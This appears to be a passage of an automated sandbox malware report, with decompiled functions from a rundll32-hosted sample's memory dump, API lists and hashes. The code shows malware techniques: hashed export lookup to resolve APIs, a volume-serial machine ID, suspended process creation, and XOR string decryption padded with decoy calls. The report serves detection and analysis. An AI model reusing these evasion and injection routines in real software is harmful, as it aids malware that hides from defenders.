Instruction ID: 80a2d7d036165bc14b48850e6024513d9fddfdb52f016c1b5dbb7aafe23130f4
Opcode Fuzzy Hash: 42e5fba076c7827de525e1b4c9e8642536cdc67f506d4038097897d84a8ffffd
Instruction Fuzzy Hash: 6341D072D052199FDB11DFA4C9C49EDBBB5EF487A4F2400A9D881B7240EB31AD81CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 041B92F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E041B92F0(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E041BE605( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E041BCE25( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x041b92f9
0x041b92fb
0x041b92fe
0x041b9301
0x041b9307
0x041b9364
0x00000000
0x041b9364
0x041b9309
0x041b9314
0x041b9317
0x041b931c
0x041b9321
0x041b9324
0x041b9326
0x041b9329
0x041b932c
0x041b9331
0x00000000
0x00000000
0x00000000
0x00000000
0x041b9333
0x041b9333
0x041b9345
0x041b9352
0x041b9356
0x00000000
0x00000000
0x041b9358
0x041b935b
0x041b935c
0x041b9362
0x00000000
0x00000000
0x00000000
0x041b9362
0x041b9379
0x041b937e
0x041b9382
0x00000000
0x041b938e
0x041b938e
0x041b9390
0x041b9390
0x041b9396
0x00000000
0x00000000
0x041b939c
0x041b93a0
0x041b93a4
0x00000000
0x00000000
0x00000000
0x041b93a4
0x041b93aa
0x041b93b2
0x041b93b7
0x041b93ba
0x041b93ba
0x041b93bc
0x041b93c0
0x041b93c8
0x00000000
0x00000000
0x041b93cc
0x041b93d4
0x00000000
0x00000000
0x00000000
0x041b93d4

APIs

LoadLibraryA.KERNELBASE(.dll,?,00000144,00000000), ref: 041B93C0
GetProcAddress.KERNEL32(00000000,?), ref: 041B93CC

Strings

.dll, xrefs: 041B93BC, 041B93BF

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 418206f944297c360b7a8b229065ce2ceca40d8f68a4924a1485c4a7ca8a15e0
Instruction ID: 389e2674e0535004fad008e0a71f6f30edc32d6c35f19e2d2fad6ce34ce39604
Opcode Fuzzy Hash: 418206f944297c360b7a8b229065ce2ceca40d8f68a4924a1485c4a7ca8a15e0
Instruction Fuzzy Hash: F031C0B1A143159BCB24CF79CAC46EEBBF9AF44304F2804A9D981D72A1D730E982C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 041BD04D Relevance: 4.6, APIs: 3, Instructions: 82
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E041BD04D(WCHAR* __ecx, WCHAR* __edx, void* __eflags) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				char _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t26;
				signed int _t28;
				void* _t32;
				long _t37;
				WCHAR* _t42;
				WCHAR* _t57;
				void* _t60;

				_v8 = _v8 & 0x00000000;
				_t42 = __edx;
				_t57 = __ecx;
				E041B92A2(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x41d0fa0; // 0x439f8a0
				 *((intOrPtr*)(_t23 + 0xc0))( &_v12);
				E041BC145(__edx,  &_v528, 0x100);
				 *((intOrPtr*)(_t60 + 0xc)) = 0x331;
				_t26 = E041B90EA(__edx,  &_v528);
				_v16 = _t26;
				_t28 = GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t28;
				E041B9D66( &_v16);
				_t32 = E041BCE3E(_t42);
				E041BC08E( &(_t42[E041BCE3E(_t42)]), 0x100 - _t32, L"%u", _v8);
				lstrcatW(_t42, _t57);
				_t37 = E041BCE3E(_t42);
				_v12 = _t37;
				CharUpperBuffW(_t42, _t37);
				return E041BE605(_t42, E041BCE3E(_t42) + _t39, 0);
			}

0x041bd056
0x041bd062
0x041bd068
0x041bd06a
0x041bd072
0x041bd080
0x041bd085
0x041bd094
0x041bd099
0x041bd0a0
0x041bd0ad
0x041bd0c7
0x041bd0cc
0x041bd0ce
0x041bd0d5
0x041bd0e5
0x041bd0f6
0x041bd100
0x041bd108
0x041bd10f
0x041bd112
0x041bd12f

APIs

Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4

GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 041BD0C7

Part of subcall function 041BC08E: _vsnwprintf.MSVCRT ref: 041BC0AB

lstrcatW.KERNEL32(?,00000114), ref: 041BD100
CharUpperBuffW.USER32(?,00000000), ref: 041BD112

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatmemset
String ID:
API String ID: 3467380347-0
Opcode ID: 34d1d9af1a7656626a48eadab97d66dd587daa71ffd6da2fc542b01a229422ec
Instruction ID: 649343a4ec5c9841052a30ad9476829971fe0fd6f48c996c98a7106fe2029ee2
Opcode Fuzzy Hash: 34d1d9af1a7656626a48eadab97d66dd587daa71ffd6da2fc542b01a229422ec
Instruction Fuzzy Hash: D92165B2A01214AFE714ABA5DCC9FEE7BBCEF84204F104169E545D3140EB746E448BE0

Uniqueness

Uniqueness Score: -1.00%

Function 041BDBAF Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E041BDBAF(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E041B911F(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E041B913B( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x041bdbb2
0x041bdbb3
0x041bdbba
0x041bdbc2
0x041bdbc6
0x041bdbcf
0x041bdc15
0x041bdc15
0x041bdbdc
0x041bdbe4
0x041bdbe6
0x041bdbec
0x041bdc05
0x00000000
0x041bdc07
0x041bdc0c
0x00000000
0x041bdc12
0x041bdbee
0x041bdbee
0x041bdbee
0x041bdbee
0x041bdbec
0x041bdc1b

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,041B0000,00000000,00000000,?,041BDC30,00000000,00000000,?,041BDC59), ref: 041BDBCA
GetLastError.KERNEL32(?,041BDC30,00000000,00000000,?,041BDC59,00001644,?,041BBBDE), ref: 041BDBD1
GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,041BDC30,00000000,00000000,?,041BDC59,00001644,?,041BBBDE), ref: 041BDC00

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: e5134511b6ec91cd16069cbd0e72af641e4aeab923dc4fac411a1f62f97cd1e0
Instruction ID: d0b70affb64918f9947f9956874c31f4ca09cf306f5d2f6ea4e1fb2c20d19708
Opcode Fuzzy Hash: e5134511b6ec91cd16069cbd0e72af641e4aeab923dc4fac411a1f62f97cd1e0
Instruction Fuzzy Hash: F901F2B2711124BF8B299AA6EDC8DDB7FBCDF496A4B200469F642D2100E770ED4087E0

Uniqueness

Uniqueness Score: -1.00%

Function 041BA952 Relevance: 4.5, APIs: 3, Instructions: 44
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E041BA952(void* __ecx, void* __eflags) {
				char _v44;
				intOrPtr _t9;
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t17;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;

				_t9 =  *0x41d0fd8; // 0x439fc50
				_t1 = _t9 + 0xac; // 0x68711f3a
				_t21 = __ecx;
				E041BBFAB( &_v44,  *_t1 + 7, __eflags);
				_t32 = 0;
				_t12 =  *0x41d0fa0; // 0x439f8a0
				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
				_t29 = _t13;
				if(_t29 != 0) {
					GetLastError();
					ResumeThread( *(_t21 + 4));
					_t17 =  *0x41d0fa0; // 0x439f8a0
					_push(0x2710);
					_push(_t29);
					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
						_t32 = 1;
					}
					FindCloseChangeNotification(_t29);
					_t13 = _t32;
				}
				return _t13;
			}

0x041ba955
0x041ba95d
0x041ba965
0x041ba96e
0x041ba976
0x041ba979
0x041ba981
0x041ba987
0x041ba98b
0x041ba98d
0x041ba99b
0x041ba9a1
0x041ba9a6
0x041ba9ab
0x041ba9b1
0x041ba9b5
0x041ba9b5
0x041ba9bd
0x041ba9c0
0x041ba9c0
0x041ba9c6

APIs

GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,041B4C08), ref: 041BA98D
ResumeThread.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,041B4C08), ref: 041BA99B
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,041B4C08), ref: 041BA9BD

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotificationResumeThread
String ID:
API String ID: 4135917582-0
Opcode ID: 51acd420ff868960a5b265aaa4232ff5b3150bc9b1bb70ad5cf333ffc2f0086e
Instruction ID: 886e165a60462729ce582a34e52791a909e72102c2d20a8ced63bbae441a0593
Opcode Fuzzy Hash: 51acd420ff868960a5b265aaa4232ff5b3150bc9b1bb70ad5cf333ffc2f0086e
Instruction Fuzzy Hash: 37014F722021109FC7059B99E888EAF7FB8EF4D695F554068F645D7205D734AC81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 041B9C9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E041B9C9B(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				char _v88;
				int _t19;
				struct _numberfmt* _t29;
				signed int _t33;
				signed int _t34;
				struct _numberfmt* _t36;
				void* _t38;
				void* _t41;
				struct _numberfmt* _t44;
				signed int _t45;

				_t41 = __edx;
				_t45 = _a12;
				_t44 = 0;
				_v8 = __ecx;
				_t33 = 0;
				if(_t45 >= __edx) {
					L5:
					_t19 = GetNumberFormatA(0x7d3, 0xb4, "electricmadness", _t44,  &_v88, 0x22); // executed
					if(_t19 != 0) {
						_t36 = _t44;
						do {
							_t36 = _t36 + 1;
						} while (_t36 < 0x22);
						L11:
						_t38 = E041B911F(2 + _t33 * 2);
						if(_t38 != 0) {
							if(_t33 == 0) {
								L15:
								return _t38;
							} else {
								goto L14;
							}
							do {
								L14:
								 *((short*)(_t38 + _t44 * 2)) = ( *((_t45 & 0x0000007f) + _a4) ^  *(_t45 + _v8)) & 0x000000ff;
								_t44 = _t44 + 1;
								_t45 = _t45 + 1;
							} while (_t44 < _t33);
							goto L15;
						}
						return 0x41d10a8;
					}
					_t29 = _t44;
					do {
						_t29 = _t29 + 1;
					} while (_t29 < 0x14);
					goto L11;
				}
				while( *((_t45 & 0x0000007f) + _a4) !=  *(_t45 + _v8)) {
					_t45 = _t45 + 1;
					if(_t45 < _t41) {
						continue;
					}
					_t45 = _a12;
					goto L5;
				}
				_t34 = _t45;
				_t45 = _a12;
				_t33 = _t34 - _t45;
				goto L5;
			}

0x041b9c9b
0x041b9ca3
0x041b9ca7
0x041b9ca9
0x041b9cac
0x041b9cb0
0x041b9cd6
0x041b9cec
0x041b9cf4
0x041b9d00
0x041b9d02
0x041b9d02
0x041b9d03
0x041b9d08
0x041b9d16
0x041b9d1a
0x041b9d25
0x041b9d45
0x00000000
0x00000000
0x00000000
0x00000000
0x041b9d27
0x041b9d27
0x041b9d3b
0x041b9d3f
0x041b9d40
0x041b9d41
0x00000000
0x041b9d27
0x00000000
0x041b9d1c
0x041b9cf6
0x041b9cf8
0x041b9cf8
0x041b9cf9
0x00000000
0x041b9cfe
0x041b9cb2
0x041b9cc5
0x041b9cc8
0x00000000
0x00000000
0x041b9cca
0x00000000
0x041b9cca
0x041b9ccf
0x041b9cd1
0x041b9cd4
0x00000000

APIs

GetNumberFormatA.KERNEL32 ref: 041B9CEC

Strings

electricmadness, xrefs: 041B9CDD

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: FormatNumber
String ID: electricmadness
API String ID: 481257995-1127315026
Opcode ID: 885ecfdb4fd67d3981d57ac72f43e4455aa722d82b748c8aeb6167a8d5b9e8ad
Instruction ID: 021f1cc95d472873883171b07edc2758d7a0fc3b7311ca6e934bb4f214898218
Opcode Fuzzy Hash: 885ecfdb4fd67d3981d57ac72f43e4455aa722d82b748c8aeb6167a8d5b9e8ad
Instruction Fuzzy Hash: BA1159B27243586BDB059F5998D16FA77AAAF89210B1404A9EBD2EB351D770FC03C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 041B9BF7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E041B9BF7(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				char _v88;
				signed int _t21;
				struct _numberfmt* _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				signed int _t30;
				signed int _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				signed int _t37;
				signed int _t38;
				void* _t39;

				_t34 = __edx;
				_t29 = __ecx;
				_t37 = _a12;
				_t38 = _t37;
				_v8 = __ecx;
				if(_t37 >= __edx) {
					L4:
					_t27 = 0;
					if(GetNumberFormatA(0xdc, 0x172, "chickenfried", 0,  &_v88, 0x22) != 0) {
						do {
							_t27 = _t27 + 1;
						} while (_t27 < 0x22);
						L14:
						_t30 = 0x41d107e;
						L15:
						return _t30;
					} else {
						goto L5;
					}
					do {
						L5:
						_t27 = _t27 + 1;
					} while (_t27 < 0x14);
					goto L14;
				}
				_t28 = _a4;
				while( *((intOrPtr*)((_t38 & 0x0000007f) + _t28)) !=  *((intOrPtr*)(_t38 + _t29))) {
					_t38 = _t38 + 1;
					if(_t38 < _t34) {
						continue;
					}
					goto L4;
				}
				_t39 = _t38 - _t37;
				if(_t39 == 0) {
					goto L4;
				}
				_t21 = E041B911F(_t39 + 1); // executed
				_t32 = _t21;
				_a12 = _t32;
				if(_t32 != 0) {
					_t33 = _v8;
					_t36 = _t32 - _t37;
					do {
						 *(_t36 + _t37) =  *((_t37 & 0x0000007f) + _t28) ^  *(_t37 + _t33);
						_t37 = _t37 + 1;
						_t39 = _t39 - 1;
					} while (_t39 != 0);
					_t30 = _a12;
					goto L15;
				}
				return 0x41d107e;
			}

0x041b9bf7
0x041b9bf7
0x041b9c00
0x041b9c03
0x041b9c05
0x041b9c0a
0x041b9c21
0x041b9c26
0x041b9c41
0x041b9c89
0x041b9c89
0x041b9c8a
0x041b9c8f
0x041b9c8f
0x041b9c94
0x00000000
0x00000000
0x00000000
0x00000000
0x041b9c43
0x041b9c43
0x041b9c43
0x041b9c44
0x00000000
0x041b9c49
0x041b9c0c
0x041b9c0f
0x041b9c1c
0x041b9c1f
0x00000000
0x00000000
0x00000000
0x041b9c1f
0x041b9c4b
0x041b9c4d
0x00000000
0x00000000
0x041b9c53
0x041b9c59
0x041b9c5b
0x041b9c60
0x041b9c6b
0x041b9c6e
0x041b9c70
0x041b9c7b
0x041b9c7e
0x041b9c7f
0x041b9c7f
0x041b9c84
0x00000000
0x041b9c84
0x00000000

APIs

GetNumberFormatA.KERNEL32 ref: 041B9C39

Strings

chickenfried, xrefs: 041B9C2A

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: FormatNumber
String ID: chickenfried
API String ID: 481257995-586419266
Opcode ID: 6bf835e311f95c403f06d40a91c91af8ef103c927e37cec8e2a2613c98f215e2
Instruction ID: e8cd0e75a0ef8a21227eed4e34db13a289cb803dea3acbb360d85043690366bc
Opcode Fuzzy Hash: 6bf835e311f95c403f06d40a91c91af8ef103c927e37cec8e2a2613c98f215e2
Instruction Fuzzy Hash: 60117DF17142556FD7178F6C88D05FA7BEA9B8521472104A9E7D6AB341D720FC0383D0

Uniqueness

Uniqueness Score: -1.00%

Function 041BCA94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E041BCA94(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E041B92A2(__edx, 0, 0x10);
				E041B92A2( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x041bcaa5
0x041bcab2
0x041bcaba
0x041bcad6
0x041bcadc
0x041bcae3

APIs

Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 041BCAD6

Strings

D, xrefs: 041BCABA

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: CreateProcessmemset
String ID: D
API String ID: 2296119082-2746444292
Opcode ID: 1834c56068b8e9d375cf5ed20af35749657648541936ed350293a01df60cc832
Instruction ID: 315d137bb1c582bbdbda694f7fef7a4c585920345ea1bc20d12564086e27e263
Opcode Fuzzy Hash: 1834c56068b8e9d375cf5ed20af35749657648541936ed350293a01df60cc832
Instruction Fuzzy Hash: 9CF030F2A512083EF620E666CC0AFBF3AACDB85714F504065BB05EB1C0E6A4AD0582A5

Uniqueness

Uniqueness Score: -1.00%

Function 041B1494 Relevance: 3.1, APIs: 2, Instructions: 108
sleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E041B1494(void* __edi, void* __fp0) {
				char _v8;
				void* __ecx;
				char _t19;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t27;
				signed int _t29;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr _t40;
				void* _t50;
				intOrPtr _t52;
				void* _t56;
				void* _t58;
				signed int _t60;
				char _t62;

				_t68 = __fp0;
				E041B15D4();
				_t19 = E041B911F(0x20);
				_v8 = _t19;
				_t54 = 0x1f;
				do {
					_t2 = _t54 + 0x63; // 0x82
					 *((char*)(_t54 + _t19)) = _t2;
					_t54 = _t54 - 1;
				} while (_t54 >= 0);
				E041B913B( &_v8, 0);
				_t22 = E041BBB4D(_t54, __fp0); // executed
				 *0x41d0fd8 = _t22;
				if(_t22 != 0) {
					E041C4257( *((intOrPtr*)(_t22 + 0x224)));
					_t24 =  *0x41d0fd8; // 0x439fc50
					_t60 = 1;
					_t50 = _t58;
					__eflags =  *((intOrPtr*)(_t24 + 0x101c)) - 1;
					if( *((intOrPtr*)(_t24 + 0x101c)) == 1) {
						__imp__CoInitializeEx(0, 6, __edi);
						_t30 =  *0x41d0fd8; // 0x439fc50
						_push(0);
						_push(0x41cd9b8);
						_t31 = _t30 + 0x228;
						__eflags = _t31;
						_push(_t31);
						_t56 = E041B9924(0x41cd9b8);
						_t62 = E041B16EC(0x41cd9b8, 0x2a);
						_v8 = _t62;
						while(1) {
							_t52 =  *0x41d0fd8; // 0x439fc50
							_t34 =  *0x41d0fc0; // 0x439fa38
							_t36 =  *0x41d0fb4; // 0x439fc18
							_t37 =  *_t36( *((intOrPtr*)(_t34 + 0x54))(_t62, _t52 + 0x1644, _t56, 0, 0));
							__eflags = _t37 - 5;
							if(_t37 != 5) {
								break;
							}
							Sleep(0x7d0);
						}
						E041B9D66( &_v8);
						_t40 =  *0x41d0fa0; // 0x439f8a0
						_pop(_t50);
						 *((intOrPtr*)(_t40 + 0xec))(0);
						_t24 =  *0x41d0fd8; // 0x439fc50
						_t60 = 1;
						__eflags = 1;
					}
					__eflags =  *(_t24 + 0x1898) & 0x00010082;
					if(( *(_t24 + 0x1898) & 0x00010082) != 0) {
						L13:
						 *((intOrPtr*)(_t24 + 0xa4)) = _t60;
						_t25 =  *0x41d0fd8; // 0x439fc50
						__eflags =  *((intOrPtr*)(_t25 + 0x214)) - 3;
						if(__eflags != 0) {
							goto L15;
						} else {
							goto L14;
						}
					} else {
						_t14 = _t24 + 0x224; // 0x41b0000
						_t54 =  *_t14;
						_t29 = E041BA664( *_t14); // executed
						__eflags = _t29;
						_t24 =  *0x41d0fd8; // 0x439fc50
						_t50 = _t50;
						if(_t29 == 0) {
							goto L13;
						} else {
							__eflags =  *((intOrPtr*)(_t24 + 0x214)) - 3;
							if( *((intOrPtr*)(_t24 + 0x214)) == 3) {
								L14:
								__eflags = E041B29DD();
								if(__eflags < 0) {
									L15:
									E041B12F8(_t50, _t54, __eflags, _t68);
								}
							}
						}
					}
					_t27 = 0;
					__eflags = 0;
				} else {
					_t27 = _t22 + 1;
				}
				return _t27;
			}

0x041b1494
0x041b1498
0x041b149f
0x041b14a7
0x041b14aa
0x041b14ab
0x041b14ab
0x041b14ae
0x041b14b1
0x041b14b1
0x041b14be
0x041b14c4
0x041b14c9
0x041b14d1
0x041b14e0
0x041b14e5
0x041b14ec
0x041b14ed
0x041b14ee
0x041b14f4
0x041b14fe
0x041b1504
0x041b150e
0x041b150f
0x041b1510
0x041b1510
0x041b1515
0x041b151e
0x041b1525
0x041b152a
0x041b152d
0x041b152d
0x041b1533
0x041b1547
0x041b154c
0x041b154e
0x041b1551
0x00000000
0x00000000
0x041b1558
0x041b1558
0x041b1564
0x041b1569
0x041b156e
0x041b1570
0x041b1576
0x041b157d
0x041b157d
0x041b157e
0x041b157f
0x041b1589
0x041b15ac
0x041b15ac
0x041b15b2
0x041b15b7
0x041b15be
0x00000000
0x00000000
0x00000000
0x00000000
0x041b158b
0x041b158b
0x041b158b
0x041b1592
0x041b1597
0x041b1599
0x041b159e
0x041b159f
0x00000000
0x041b15a1
0x041b15a1
0x041b15a8
0x041b15c0
0x041b15c5
0x041b15c7
0x041b15c9
0x041b15c9
0x041b15c9
0x041b15c7
0x041b15a8
0x041b159f
0x041b15ce
0x041b15ce
0x041b14d3
0x041b14d3
0x041b14d3
0x041b15d3

APIs

